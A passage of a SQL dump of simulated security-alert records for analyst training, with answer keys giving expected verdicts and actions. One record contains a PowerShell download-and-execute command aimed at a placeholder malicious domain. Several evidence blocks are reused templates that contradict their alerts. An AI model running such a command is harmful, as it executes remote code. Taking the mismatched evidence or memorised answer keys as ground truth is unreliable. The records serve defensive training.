activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as Trojan by 45 AV vendors\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The hash and external IP both have malicious indicators, confirming the detection of malware.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(246, 'Phishing Attempt Detected - Malicious Email Link', 'medium', 'Proofpoint', 'A phishing email was received containing a malicious link attempting to harvest credentials. The sender\'s domain is known for phishing activities.', 'Phishing', 'T1566', 1, 'investigating', 232, '{\"timestamp\":\"2023-10-05T09:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.10\",\"email_sender\":\"phisher@example.com\",\"url\":\"http://malicious-site.com/login\",\"username\":\"asmith\"}', '2025-12-28 12:31:27', '2026-03-15 18:05:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Domain frequently used in phishing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Site flagged for credential phishing\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with spam and phishing\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Both the sender\'s email and the URL are flagged as malicious, confirming a phishing attempt.\"}', 'Beginner', 'SIEM', 1, 0, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt Detected - Malicious Email Link\",\"date\":\"2026-02-01T20:32:18.842Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(247, 'Brute Force Attack Detected - Multiple Failed Logins', 'critical', 'Wazuh', 'Multiple failed login attempts detected, indicating a possible brute force attack. The source IP is from a foreign country with a history of attacks.', 'Brute Force', 'T1110', 1, 'Closed', 232, '{\"timestamp\":\"2023-10-05T17:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"192.168.1.10\",\"username\":\"administrator\",\"failed_attempts\":45}', '2025-12-28 11:20:25', '2026-03-07 14:21:36', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"Shodan\",\"verdict\":\"malicious\",\"details\":\"IP known for brute force attack attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address targeted by brute force\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High number of failed attempts from a malicious IP confirms a brute force attack.\"}', 'Advanced', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.843Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-02-01T20:31:18.843Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-02-01T20:30:18.843Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-02-01T20:29:18.843Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-02-01T20:28:18.843Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"failed_attempts\\\":45}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(248, 'Suspicious Network Traffic - False Positive', 'low', 'Firewall', 'Network traffic was detected from a known cloud provider IP, initially flagged as suspicious. Further investigation reveals it to be legitimate.', 'Network Anomaly', 'T1071', 0, 'investigating', 232, '{\"timestamp\":\"2023-10-05T11:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.120\",\"dst_ip\":\"192.168.1.50\",\"username\":\"n/a\",\"hostname\":\"SERVER-1\"}', '2025-12-28 01:16:06', '2026-03-15 15:44:09', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.120\",\"is_critical\":false,\"osint_result\":{\"source\":\"IPInfo\",\"verdict\":\"clean\",\"details\":\"IP belongs to a reputable cloud service provider\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a legitimate server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The source IP is from a legitimate cloud provider, reducing the likelihood of malicious intent.\"}', 'Beginner', 'NDR', 1, 0, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(249, 'Suspicious PowerShell Command Execution Detected', 'high', 'endpoint', 'A suspicious PowerShell command that could potentially allow remote code execution or credential dumping was detected on an endpoint.', 'Execution', 'T1086', 1, 'investigating', 232, '{\"log_type\":\"process_creation\",\"timestamp\":\"2023-10-12T14:22:09Z\",\"hostname\":\"Corporate-Laptop-04\",\"username\":\"jdoe\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell -nop -c \\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\')\\\"\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":4821,\"process_id\":9342,\"integrity_level\":\"High\",\"network_activity\":[{\"protocol\":\"HTTP\",\"dest_ip\":\"192.168.1.105\",\"dest_port\":80,\"url\":\"http://maliciousdomain.com/script.ps1\"}]}', '2025-12-28 05:40:53', '2026-03-15 18:14:41', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"253.135.96.33\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(250, 'Suspicious PowerShell Command Execution Detected', 'medium', 'process', 'A PowerShell script was executed with encoded commands which is commonly used to obfuscate malicious scripts.', 'Behavioral Anomaly', 'T1086', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-23T14:25:36Z\",\"host_name\":\"HR-DESKTOP-07\",\"user_name\":\"j.smith\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBy\\nYW5kb20gdGV4dF0NCmVjaG8gIlRoaXMgaXMgYSB0ZXN0LiI=\",\"file_hash\":\"3fa4cd6c63168b1eae1f3116ce3f789a175c3abe\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":3452,\"process_id\":6784,\"integrity_level\":\"High\",\"src_ip\":\"192.168.10.23\",\"geo_location\":\"\",\"event_id\":4688,\"logon_type\":2}', '2025-12-28 05:25:32', '2026-02-17 22:34:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"61.243.64.122\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP 61.243.64.122 has 0% abuse confidence score. Located in corporate network range.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"root\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User accessed from known location during normal business hours. Activity consistent with role.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(251, 'Suspicious Network Activity Detected: Potential Data Exfiltration', 'high', 'network', 'Unusual outbound network activity detected, with large volumes of data being transferred to an unknown external IP address over an atypical port.', 'data_exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-11-01T14:23:45Z\",\"src_ip\":\"192.168.1.10\",\"dest_ip\":\"203.0.113.54\",\"src_port\":49876,\"dest_port\":8080,\"protocol\":\"TCP\",\"bytes_sent\":87000000,\"bytes_received\":1240,\"session_duration_sec\":3600,\"flags\":\"SYN,ACK\",\"geoip\":{\"country\":\"Unknown\",\"city\":\"Unknown\"},\"user_agent\":\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\",\"anomalies\":[\"Unusual port communication\",\"High data transfer volume\"],\"event_id\":\"net-20231101-42345\"}', '2025-12-28 05:42:26', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"237.158.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 237.158.1.45 reported 452 times for malicious activity. Abuse confidence score: 86%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(252, 'Successful Login with Previously Compromised Credentials', 'high', 'Authentication Logs', 'An unauthorized login attempt was detected and successfully executed using credentials associated with a known compromised email. This alert aligns with an attack pattern observed in the Acme Corp breach of August 2023, where attackers used publicly available credentials to infiltrate user accounts.', 'Credential Access', 'T1078', 1, 'resolved', 95, '{\"timestamp\":\"2023-10-11T13:45:23Z\",\"event_source\":\"Authentication Logs\",\"event_id\":\"401\",\"username\":\"j.doe@examplecorp.com\",\"ip_address\":\"192.0.2.123\",\"location\":\"Toronto, Canada\",\"login_status\":\"Success\",\"authentication_method\":\"Password\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\",\"previous_compromise\":\"yes\",\"related_event_ids\":[\"ACME-20230815-0423\"],\"risk_score\":85,\"request_id\":\"req-123456789\"}', '2025-12-28 05:00:05', '2026-02-16 02:40:52', NULL, 'Intermediate', 'SIEM', 1, 0, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(253, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A PowerShell script was executed on a host, which is often used by attackers to download and execute malware. Analysis revealed the script attempted to communicate with a known malicious server.', 'Malware', 'T1059', 1, 'Closed', 141, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1A2B3C\",\"file_hash\":\"abc123def456ghi789jkl012mno345pq\",\"domain\":\"malicious-example.com\"}', '2025-12-28 17:13:32', '2026-02-12 04:18:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abc123def456ghi789jkl012mno345pq\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash found in 12 AV engines detecting it as a trojan\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell execution with outbound connection to a known malicious IP indicates a malware attempt.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(254, 'Credential Phishing Attempt via Email', 'critical', 'Proofpoint', 'An email was received from a spoofed domain attempting to trick users into providing credentials by clicking a malicious link.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-02T09:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.55\",\"username\":\"asmith\",\"hostname\":\"MAILSERVER\",\"email_sender\":\"no-reply@secure-login.com\",\"url\":\"http://malicious-link.com/login\"}', '2025-12-28 17:13:32', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL flagged for phishing attempts\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the email recipient\'s server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email with a known phishing URL and spoofed sender suggests a credential phishing attempt.\"}', 'Advanced', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Credential Phishing Attempt via Email\",\"date\":\"2026-02-01T20:32:18.850Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(255, 'Unauthorized Database Access Detected', 'high', 'database', 'Suspicious access detected on the corporate database outside of normal hours from an unrecognized IP address.', 'Anomaly Detection', 'T1078: Valid Accounts', 1, 'investigating', 54, '{\"timestamp\":\"2023-10-13T02:17:36Z\",\"event_type\":\"DB_access\",\"user\":\"jdoe\",\"access_time\":\"2023-10-13T02:16:45Z\",\"database\":\"CustomerData\",\"action\":\"SELECT\",\"affected_tables\":[\"customers\",\"orders\"],\"source_ip\":\"192.168.32.201\",\"dest_ip\":\"10.0.0.15\",\"login_status\":\"success\",\"access_method\":\"remote\",\"anomalous_activity\":true,\"notes\":\"Access outside of normal working hours (9am-6pm) by user accessing database for the first time.\"}', '2025-12-29 05:48:29', '2026-02-14 17:06:55', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"216.32.48.90\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.851Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-13T02:17:36Z\\\",\\\"event_type\\\":\\\"DB_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"access_time\\\":\\\"2023-10-13T02:16:45Z\\\",\\\"database\\\":\\\"CustomerData\\\",\\\"action\\\":\\\"SELECT\\\",\\\"affected_tables\\\":[\\\"customers\\\",\\\"orders\\\"],\\\"source_ip\\\":\\\"192.168.32.201\\\",\\\"dest_ip\\\":\\\"10.0.0.15\\\",\\\"login_status\\\":\\\"success\\\",\\\"access_method\\\":\\\"remote\\\",\\\"anomalous_activity\\\":true,\\\"notes\\\":\\\"Access outside of normal working hours (9am-6pm) by user accessing database for the first time.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.851Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-13T02:17:36Z\\\",\\\"event_type\\\":\\\"DB_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"access_time\\\":\\\"2023-10-13T02:16:45Z\\\",\\\"database\\\":\\\"CustomerData\\\",\\\"action\\\":\\\"SELECT\\\",\\\"affected_tables\\\":[\\\"customers\\\",\\\"orders\\\"],\\\"source_ip\\\":\\\"192.168.32.201\\\",\\\"dest_ip\\\":\\\"10.0.0.15\\\",\\\"login_status\\\":\\\"success\\\",\\\"access_method\\\":\\\"remote\\\",\\\"anomalous_activity\\\":true,\\\"notes\\\":\\\"Access outside of normal working hours (9am-6pm) by user accessing database for the first time.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.851Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-13T02:17:36Z\\\",\\\"event_type\\\":\\\"DB_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"access_time\\\":\\\"2023-10-13T02:16:45Z\\\",\\\"database\\\":\\\"CustomerData\\\",\\\"action\\\":\\\"SELECT\\\",\\\"affected_tables\\\":[\\\"customers\\\",\\\"orders\\\"],\\\"source_ip\\\":\\\"192.168.32.201\\\",\\\"dest_ip\\\":\\\"10.0.0.15\\\",\\\"login_status\\\":\\\"success\\\",\\\"access_method\\\":\\\"remote\\\",\\\"anomalous_activity\\\":true,\\\"notes\\\":\\\"Access outside of normal working hours (9am-6pm) by user accessing database for the first time.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.851Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-13T02:17:36Z\\\",\\\"event_type\\\":\\\"DB_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"access_time\\\":\\\"2023-10-13T02:16:45Z\\\",\\\"database\\\":\\\"CustomerData\\\",\\\"action\\\":\\\"SELECT\\\",\\\"affected_tables\\\":[\\\"customers\\\",\\\"orders\\\"],\\\"source_ip\\\":\\\"192.168.32.201\\\",\\\"dest_ip\\\":\\\"10.0.0.15\\\",\\\"login_status\\\":\\\"success\\\",\\\"access_method\\\":\\\"remote\\\",\\\"anomalous_activity\\\":true,\\\"notes\\\":\\\"Access outside of normal working hours (9am-6pm) by user accessing database for the first time.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.851Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-13T02:17:36Z\\\",\\\"event_type\\\":\\\"DB_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"access_time\\\":\\\"2023-10-13T02:16:45Z\\\",\\\"database\\\":\\\"CustomerData\\\",\\\"action\\\":\\\"SELECT\\\",\\\"affected_tables\\\":[\\\"customers\\\",\\\"orders\\\"],\\\"source_ip\\\":\\\"192.168.32.201\\\",\\\"dest_ip\\\":\\\"10.0.0.15\\\",\\\"login_status\\\":\\\"success\\\",\\\"access_method\\\":\\\"remote\\\",\\\"anomalous_activity\\\":true,\\\"notes\\\":\\\"Access outside of normal working hours (9am-6pm) by user accessing database for the first time.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
